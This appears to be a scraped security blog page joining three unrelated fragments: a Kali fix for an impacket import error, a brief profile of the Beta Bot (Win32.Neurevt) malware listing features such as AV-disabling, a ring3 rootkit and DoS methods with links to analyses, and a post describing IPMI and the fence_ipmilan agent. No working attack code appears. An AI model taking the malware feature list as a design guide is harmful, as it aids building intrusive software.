ImportError: cannot import name LOG



Solution:

root@kali:~# pip install impacket --upgrade

Beta Bot Analysis

Win32.Neurevt, circulating under the name Beta Bot, is an HTTP bot that entered the underground market in the first part of 2013.

As can be seen from the sales thread, this piece of code, written in C++, has many functionalities. Among others, we found:


  • AV-Disabling
  • Bot Killer
  • Ring3 Rootkit
  • Custom Injection Techniques
  • Proactive Defense Mode


At less than €500, Beta Bot is sold relatively cheaply considering its vast feature list. It also includes the standard features of today's bots, such as several DoS attack methods, a DNS blocker, etc.


Reference & details:

http://resources.infosecinstitute.com/beta-bot-analysis-part-1/

http://resources.infosecinstitute.com/beta-bot-analysis-part-2/


Credits and References:

https://github.com/KenMacD/betabot-re
https://blog.fortinet.com/post/neurevt-bot-analysis
http://vrt-blog.snort.org/2014/05/betabot-process-injection.html
https://asert.arbornetworks.com/beta-bot-a-code-review/

Thursday, October 1, 2015

IPMI: Intelligent Platform Management Interface

The Intelligent Platform Management Interface (IPMI) is a set of computer interface specifications for an autonomous computer subsystem that provides management and monitoring capabilities independently of the host system's CPU, firmware (BIOS or UEFI) and operating system. IPMI defines a set of interfaces used by system administrators for out-of-band management of computer systems and monitoring of their operation. For example, IPMI provides a way to manage a computer that may be powered off or otherwise unresponsive by using a network connection to the hardware rather than to an operating system or login shell.


fence_ipmilan

http://linux.die.net/man/8/fence_ipmilan

fence_ipmilan is an I/O Fencing agent which can be used with machines controlled by IPMI. This agent calls support software using ipmitool (http://ipmitool.sf.net/).
To use fence_ipmilan with HP iLO 3 you have to enable lanplus option (lanplus / -P) and increase wait after operation to 4 seconds (power_wait=4 / -T 4)
fence_ipmilan accepts options on the command line as well as from stdin. Fenced sends parameters through stdin when it execs the agent. fence_ipmilan can be run by itself with command line options. This is useful for testing and for turning outlets on or off from scripts.